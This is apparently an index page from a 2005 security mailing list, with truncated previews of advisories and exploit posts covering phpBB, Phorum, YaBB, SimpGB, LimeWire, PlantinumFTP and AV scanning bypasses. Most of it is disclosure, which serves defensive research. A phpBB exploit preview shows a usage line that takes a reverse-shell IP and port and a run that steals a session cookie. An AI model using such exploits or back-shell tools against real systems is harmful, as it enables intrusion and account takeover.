|
Colapse all |
Post message
[ISR] - Novell iChain Mini FTP Server Valid User Disclosure Vulnerability 2005-03-15 Francisco Amato (famato infobyte com ar) Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access 2005-03-15 Virginity Security (advisory05 konfiweb de) Few remote bugs in zPanel 2005-03-15 Mik- (misha dom no) Hello, Few bugs have been discovered (accidently) in zPanel. Developers were notified on 07.March but I have not received any response. Best regards, Mikhail. ------------------------------------------------------------- [Product Description] "ZPanel is a hosting control interface developed f [ more ] [ reply ] SAV9 Functionality Hole - misses virus files 2005-03-15 me3 neuralfibre com Product: Symantec AntiVirus Corporate Edition 9.0 Vulnerability: Files saved on the server but opened remotely via SMB are not scanned. SAV9 runs as a client - server application. The client receives updates, the server pushes them out. This has no bearing on the platforms on which they run, nor [ more ] [ reply ] phpbb <= 2.0.12 uid vuln + admin_styles.php php code injection exploit 2005-03-15 bad boy (slythers gmail com) phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port] coded by Malloc(0) Wicked Attitude tested on phpbb 2.0.11 C:\dtc>phpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888 _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperÚ ... 06bef5092f9d369f13107684f63a3499 http://site [ more ] [ reply ] Unfiltered escape sequences in filenames contained in ZIP archives wouldn't be escaped on displaying or logging, and can also lead to bypass AV scanning 2005-03-14 Dr. Peter Bieringer (pbieringer aerasec de) Hello, during investigation of Sober.l we got the idea to replace the spaces of a filename contained in the ZIP archive by some escape sequences. Many AV software is logging such filenames during decompressing, so after creating such regular ZIP archive (by using Perl Archive::Zip module, no ot [ more ] [ reply ] phpbb cookie admin access 2005-03-14 pureone (pureone36 gmail com) -------------------------------------------------------------------- Written by pureone (at) spywire (dot) net [email concealed] -------------------------------------------------------------------- -------------------------------------------------------------------- Exploit : 2.0.x >= phpbb 2.0.12 : ---------------------------- [ more ] [ reply ] RE: Av issues 2005-03-14 David Webster (dwebster wittig com) (1 replies) Symantec Corporate AV client v 9.0.3.1000 with virus defs 3/9/2005 rev. 32 detected ICAR test string in the zip file listed in the poc url. -----Original Message----- From: Bipin Gautam [mailto:visitbipin (at) hotmail (dot) com [email concealed]] Sent: Saturday, March 12, 2005 4:40 AM To: bugtraq (at) securityfocus (dot) com [email concealed] Subject: Av [ more ] [ reply ] iDEFENSE Security Advisory 03.14.05: MySQL MaxDB Web Agent Multiple Denial of Service Vulnerabilities 2005-03-14 iDEFENSE Labs (labs-no-reply idefense com) MySQL MaxDB Web Agent Multiple Denial of Service Vulnerabilities iDEFENSE Security Advisory 03.14.05 www.idefense.com/application/poi/display?id=218&type=vulnerabilities March 14, 2005 I. BACKGROUND MaxDB by MySQL is a re-branded and enhanced version of SAP DB, SAP AG's open source database. MaxD [ more ] [ reply ] DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow' 2005-03-14 Kevin Finisterre (kf digitalmunition com) Not SQL injection and XSS in paFileDB? 2005-03-12 saudi linux (ksa2ksa yahoo com) In-Reply-To: <20050312182442.22116.qmail (at) www.securityfocus (dot) com [email concealed]> >Received: (qmail 27749 invoked from network); 12 Mar 2005 19:45:27 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) > by mail.securityfocus.com with SMTP; 12 Mar 2005 19:45:27 -0000 [ more ] [ reply ] 3 XSS Vulnerabilities in Phorum <= 5.0.14 2005-03-13 Jon Oberheide (jonojono umich edu) Author: Jon Oberheide <jon (at) oberheide (dot) org [email concealed]> Date: Sat, March 12th, 2005 Summary ======= Application: Phorum Vendor Website: http://www.phorum.org Affected Versions: <= 5.0.14 Type of Vulnerability: Cross Site Scripting (XSS) About Phorum ============ Phorum i [ more ] [ reply ] YaBB2 rc1 XSS 2005-03-13 alireza hassani (trueend5 yahoo com) [PersianHacker.NET 200503-08] YaBB2 rc1 XSS Vulnerability Date: 2005 March Bug Number: 08 bid:12756 YaBB is a leading free forum software package that rivals any professional message board out there. It provides a real-time chat and support system for your visitors. More info @: http://www. [ more ] [ reply ] [SECURITYREASON.COM] phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9 2005-03-15 Maksymilian Arciemowicz (max jestsuper pl) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 13.3.2005 from securityreason.com TEAM - --- 0.Description --- phpAdsNew is an open-source ad server, with an integrated banner management int [ more ] [ reply ] html code include in phpnuke news crash IE 6 2005-03-13 WoRmZ Web (wormz web gmail com) (1 replies) www.wormzweb.tk ------------------------------------------------------------------------ ------------------------------------------------------------------------ ENGLISH ------------------------------------------------------------------------ ------------------------------------------------------ [ more ] [ reply ] Re: html code include in phpnuke news crash IE 6 2005-03-14 Berend-Jan Wever (skylined edup tudelft nl) Master RPC program number data base (/etc/rpc) 2005-03-13 Eilon Gishri (eilon aristo tau ac il) Hi, After a VERY long time a new version is available. The latest version of the file can be found at: ftp://ftp.tau.ac.il/pub/users/eilon/rpc/ Have fun, Eilon. -- Eilon Gishri eilon (at) aristo.tau.ac (dot) il [email concealed] Independent Security Consultant Mobile:+972-54-4303595 [ more ] [ reply ] [XSS] paBox 2.0 2005-03-14 Rift (Sean Sage-web com) pabox 2.0 no longer includes the Date and Time parameters in the POST data sent with your shout. The date and time parameters in previous versions were vulnerable to a cross site scripting attack. Now however in version 2.0 if you setup paBox to include an icon with your topic... eg: :winkface: [ more ] [ reply ] [ZH2005-02SA] Insecure tmp file creation in Wine 2005-03-14 Giovanni Delvecchio (badpenguin79 hotmail com) [ZH2005-02SA] Insecure tmp file creation in Wine 03/13/2005 Title: Insecure tmp file creation in Wine Author: Giovanni Delvecchio e-mail: badpenguin (at) zone-h (dot) org [email concealed] Version affected : Wine 20050211 and previous releases About Wine ======== from http://www.winehq.org/site/docs/wine-faq/index : [ more ] [ reply ] SimpGB SQL Injection Vulnerability 2005-03-13 Alexander Müller (visus portsonline net) Hi, The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be exploited to gain userdata. The quote variable isn't checked carefully in simpgb/include/gb_new.inc called by guestbook.php. I wrote a proof of concept which shows a md5 hash and the username, read from the database. s [ more ] [ reply ] New Version of WinBlox is Available 2005-03-14 Liu Die Yu (liudieyu umbrella name) Intro ===== User-mode WINAPI-level and open-source tool for controlling the behavior of applications running on Windows workstations http://umbrella.name/upid/winblox Tech ==== * system-wide dll injection by CreateRemoteThread and intercepting CreateProcessInternalW of kernel32.dll; * use detour [ more ] [ reply ] LimeWire Gnutella client two vulnerabilities 2005-03-15 Kevin Walsh (kwalsh cs cornell edu) Summary: Recent versions of the LimeWire client contain vulnerabilities that allow a remote user access to many or all files on a users machine. LimeWire is a popular client for the Gnutella filesharing network. Vulnerability 1 - Inappropriate Handling of "resource get" requests. Symptom:A remo [ more ] [ reply ] [SECURITY] [DSA 693-1] New luxman packages fix local root exploit 2005-03-14 joey infodrom org (Martin Schulze) [HAT-SQUAD] SafeNet Sentinel LM, UDP License Manager Exploit 2005-03-13 class 101 (class101 hat-squad com) Application overview: Sentinel LM is a software-based license management application allowing application developers to implement multiple pre-built license models with a single software development integration effort. Developers can sell or deliver multiple license types simply by chang [ more ] [ reply ] PlantinumFTP server <= 1.0.18 Remote DOS exploit 2005-03-14 Exoduks (exoduks gmail com) (1 replies) Here is simple exploit for PlantinumFTP server DOS bug. /* * PlantinumFTP server <= 1.0.18 Remote DOS exploit * ------------------------------------------------- * PlantinumFTP server exploit for Remote Denial of Service bug * in PlantinumFTP founded by ports. * * Coded by Exoduks - exoduks [ more ] [ reply ] Re: PlantinumFTP server <= 1.0.18 Remote DOS exploit 2005-03-15 Gary H. Jones II (gary pointblanksecurity com) |
|
Privacy Statement |
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 03.15.2005
||
.:: SUMMARY
Novell iChain Mini FTP Server Valid User Disclosure Vulnerability
Version: IChain Version v2.3, It is suspected that all previous versions of
IChan
are vulnerable.
.:: BACKGROUND
The Novell iChain prod
[ more ] [ reply ]